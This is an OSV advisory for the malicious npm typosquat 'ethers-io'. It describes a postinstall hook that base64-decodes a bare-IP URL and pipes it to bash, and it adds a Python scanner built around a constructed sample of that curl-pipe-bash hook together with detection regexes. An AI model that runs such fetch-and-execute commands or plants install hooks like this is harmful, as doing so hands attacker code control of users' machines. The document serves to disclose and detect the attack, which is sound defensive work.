MAL-2026-3708

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-io/MAL-2026-3708.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-3708
Published
2026-05-13T12:01:08Z
Modified
2026-05-15T07:51:34.899337Z
Summary
Malicious code in ethers-io (npm)
Details

Source: amazon-inspector (098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14)

The package's package.json declares a postinstall script that base64-decodes a hidden URL (http://8.217.75.147:3000/payload) and pipes the HTTP response directly to bash via curl -s <url> | bash. On every npm install, arbitrary attacker-controlled shell code is fetched over plain HTTP from a bare IPv4 address and executed on the installer's machine with no TLS, no integrity verification, and fully mutable content. Multiple independent block signals stack: obfuscated URL in a lifecycle hook, curl-pipe-bash, bare-IP plaintext C2, and purpose mismatch with the package's stated function. The package name ethers-io and its stated purpose as "I/O utilities for ethers.js" additionally impersonate the well-known ethers.js ecosystem, with the repository pointing at github.com/ethers-utils/ethers-io rather than the genuine ethers.js organization — a typosquat lure wrapped around the install-time RCE.
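As an added illustration (not code from the advisory sources or OSV), a small Python scanner that applies the block signals listed above to a package.json: it checks install-time lifecycle hooks for curl-pipe-shell, decodes base64 tokens to expose hidden URLs, and flags plaintext URLs pointing at a bare IPv4 host. The sample package.json, its package name and its TEST-NET address are constructed, not the real package's contents.

```python
import base64
import json
import re

# Constructed sample (not the real package's file): a postinstall hook that
# base64-decodes a URL and pipes the response to bash, as the advisory
# describes. 192.0.2.10 is a TEST-NET placeholder, not a live host.
HIDDEN_URL = "http://192.0.2.10:3000/payload"
_ENCODED = base64.b64encode(HIDDEN_URL.encode()).decode()
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-io",
    "description": "I/O utilities for ethers.js",
    "scripts": {
        "postinstall": f"curl -s $(echo {_ENCODED} | base64 -d) | bash",
        "test": "node test.js",
    },
})

# Scripts npm runs automatically during install, without user interaction.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
BARE_IP_URL = re.compile(r"http://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")


def decoded_urls(command):
    """Return any http(s) URLs hidden inside base64 tokens in `command`."""
    found = []
    for token in BASE64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


def scan_package_json(raw):
    """Return (hook, signal) findings for risky install-time scripts."""
    scripts = json.loads(raw).get("scripts", {})
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # "test", "build" etc. do not run on install
        if PIPE_TO_SHELL.search(command):
            findings.append((hook, "curl-pipe-shell"))
        for url in decoded_urls(command):
            findings.append((hook, "base64-hidden-url"))
            if BARE_IP_URL.match(url):
                findings.append((hook, "plaintext-bare-ip-url"))
    return findings
```

Run `scan_package_json(open("package.json").read())` against an unpacked tarball before installing; any finding on a lifecycle hook is a reason to block the package and inspect it by hand.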

Source: ossf-package-analysis (096fee7452967418fa149986d5ef661f3292d844524b58d3c3ca2b2e1b8cffc0)

The OpenSSF Package Analysis project identified 'ethers-io' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "2.0.0"
            ],
            "modified_time": "2026-05-13T12:01:08Z",
            "sha256": "096fee7452967418fa149986d5ef661f3292d844524b58d3c3ca2b2e1b8cffc0",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:24.739660541Z"
        },
        {
            "versions": [
                "1.0.0"
            ],
            "modified_time": "2026-05-13T12:01:28Z",
            "sha256": "53670603313bd7a44e508b5eae7a10e2aa77aff4ebe93bb7f37cfa14ffac16e4",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:24.632215328Z"
        },
        {
            "versions": [
                "2.0.0"
            ],
            "modified_time": "2026-05-14T19:25:08Z",
            "sha256": "098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14",
            "id": "IN-MAL-2026-002691",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:16.778530994Z"
        },
        {
            "versions": [
                "2.0.0"
            ],
            "modified_time": "2026-05-15T03:16:46Z",
            "sha256": "374ad9e5565581a12e9a891c5fffd853d7d6f548261693d05d2fe40a15001ef4",
            "id": "IN-MAL-2026-002815",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:20.673900921Z"
        },
        {
            "versions": [
                "1.0.0"
            ],
            "modified_time": "2026-05-14T19:25:07Z",
            "sha256": "5c9fe094b4d627b53e4f88fb92a2fbee76337088f6f615c7fdc6ebe95a268a34",
            "id": "IN-MAL-2026-002690",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:16.723479836Z"
        }
    ]
}
References
Credits

Affected packages

Package: npm / ethers-io
Affected ranges:
Affected versions:
  1.*
    1.0.0
  2.*
    2.0.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "ethers-io-2.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-VnyifUoRFKdpM31skgnvV3Q+BJ99rXEO4Ht2et3LGITpbS3fK4gLsyT33JBmJHMH1STGbCO9GzexGOvDXFhBxQ==",
                "sha1": "a5c87e94ece6c12d7f1fe1e1e5d89a4e736bcd7f"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "18016651d9242aa32acc1fd46d4e208ab2365c0b5c54bc24b397880e4b5e2ef02fb68d",
            "sha256": "0b6caae1378a89a996fe7e1620494a2475bce12bcdfb8848d6ca9e7ecdc3ef72"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-io/MAL-2026-3708.json"